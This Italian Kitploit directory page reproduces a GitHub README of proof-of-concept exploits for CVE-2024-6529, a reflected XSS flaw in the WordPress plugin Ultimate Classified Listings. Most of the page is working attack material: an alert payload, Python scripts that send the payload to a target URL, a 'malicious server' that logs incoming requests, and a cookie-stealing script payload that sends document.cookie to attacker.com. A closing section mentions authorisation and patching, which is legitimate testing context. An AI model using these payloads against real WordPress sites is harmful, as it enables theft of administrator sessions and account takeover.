Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-6529 — Script proof-of-concept che dimostrano vulnerabilità di XSS riflesso e furto di cookie nei plugin di WordPress, per test di sicurezza autorizzati e ricerca di vulnerabilità. | Kitploit
Strumenti/GitHubGitHub/abdurahmon3236/cve-2024-6529
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPhishingPenetration TestingIngegneria Sociale
GitHubabdurahmon3236/cve-2024-6529

CVE-2024-6529

Script proof-of-concept che dimostrano vulnerabilità di XSS riflesso e furto di cookie nei plugin di WordPress, per test di sicurezza autorizzati e ricerca di vulnerabilità.

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Prova di Concetto (PoC) per Vulnerabilità nei Plugin WordPress

Questo repository contiene script di Prova di Concetto (PoC) per varie vulnerabilità scoperte in diversi plugin WordPress. Questi script dimostrano come un attaccante può sfruttare queste vulnerabilità per eseguire azioni dannose.

Indice

  • Vulnerabilità Coperte
  • Configurazione e Utilizzo
    • XSS Riflesso nel Plugin Ultimate Classified Listings
    • Furto di Cookie Tramite XSS
  • Considerazioni Importanti

Vulnerabilità Coperte

  1. Cross-Site Scripting (XSS) Riflesso nel Plugin Ultimate Classified Listings

    • Una vulnerabilità nel plugin WordPress Ultimate Classified Listings precedente alla versione 1.4 permette agli attaccanti di eseguire JavaScript arbitrario iniettando script dannosi attraverso parametri non sanificati.
  2. Furto di Cookie Tramite XSS

    • Dimostra come un attaccante può sfruttare la vulnerabilità XSS riflesso per rubare i cookie di utenti con privilegi elevati, come gli amministratori, inviando i cookie a un server malevolo.

Configurazione e Utilizzo

XSS Riflesso nel Plugin Ultimate Classified Listings

Questa PoC dimostra come sfruttare la vulnerabilità XSS riflesso nel plugin Ultimate Classified Listings.

  1. Identificare il Parametro Vulnerabile:

    • Supponiamo che il parametro vulnerabile sia search nell'URL http://example.com/classifieds.
  2. Creare un URL Malevolo:

    • L'URL malevolo può includere un payload per eseguire un dialogo di alert:
      root@kitploit:~
      http://example.com/classifieds?search=<script>alert('XSS')</script>
      
  3. Eseguire lo Script PoC:

    • Salva il seguente script come xss_poc.py ed eseguilo.
    root@kitploit:~
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Change this to the target site's URL
    payload = "<script>alert('XSS')</script>"  # XSS payload
    
    def trigger_xss():
        # Construct the malicious URL
        malicious_url = f"{target_url}?search={payload}"
    
        # Send a GET request to the malicious URL
        response = requests.get(malicious_url)
    
        # Check if the payload is reflected in the response
        if payload in response.text:
            print("[+] XSS payload reflected in the response.")
            print("[+] Malicious URL:", malicious_url)
        else:
            print("[-] XSS payload not reflected in the response.")
    
    if __name__ == "__main__":
        trigger_xss()
    

Furto di Cookie Tramite XSS

Questa PoC dimostra come un attaccante può sfruttare la vulnerabilità XSS riflesso per rubare i cookie di utenti con privilegi elevati.

  1. Impostare un Server Malevolo:

    • Salva il seguente script come malicious_server.py ed eseguilo per avviare un server che registra le richieste in arrivo (inclusi i cookie).
    root@kitploit:~
    from http.server import BaseHTTPRequestHandler, HTTPServer
    import logging
    
    class RequestHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            logging.info(f"Received request: {self.headers}")
            self.send_response(200)
            self.end_headers()
    
    def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
        logging.basicConfig(filename='server.log', level=logging.INFO)
        server_address = ('', port)
        httpd = server_class(server_address, handler_class)
        logging.info(f'Starting server on port {port}...')
        httpd.serve_forever()
    
    if __name__ == "__main__":
        run()
    
  2. Creare un Payload per Rubare i Cookie:

    • Crea un payload che invii i cookie dell'amministratore al server malevolo:
      root@kitploit:~
      http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
      
  3. Eseguire lo Script PoC:

    • Salva il seguente script come steal_cookies_poc.py ed eseguilo.
    root@kitploit:~
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Change this to the target site's URL
    attacker_server = "http://attacker.com:8080"  # Change this to your malicious server's URL
    payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>"
    
    def trigger_xss():
        # Construct the malicious URL
        malicious_url = f"{target_url}?search={payload}"
    
        # Send a GET request to the malicious URL
        response = requests.get(malicious_url)
    
        # Check if the payload is reflected in the response
        if payload in response.text:
            print("[+] XSS payload reflected in the response.")
            print("[+] Malicious URL:", malicious_url)
        else:
            print("[-] XSS payload not reflected in the response.")
    
    if __name__ == "__main__":
        trigger_xss()
    

Considerazioni Importanti

  • Permessi: Assicurati di avere l'autorizzazione esplicita per testare queste vulnerabilità sul sito target. L'accesso non autorizzato è illegale e non etico.
  • Ambiente di Test: Esegui questi test in un ambiente controllato per evitare impatti sui sistemi di produzione.
  • Mitigazione: Aggiorna il plugin Ultimate Classified Listings alla versione 1.4 o successiva. Sanifica e sfuggi sempre gli input utente prima di includerli nell'output.

Queste PoC dimostrano come un attaccante potrebbe sfruttare le vulnerabilità nei plugin WordPress per eseguire azioni dannose. Mantieni sempre il tuo software aggiornato e segui le migliori pratiche di sicurezza per prevenire tali vulnerabilità.

Scarica lo strumento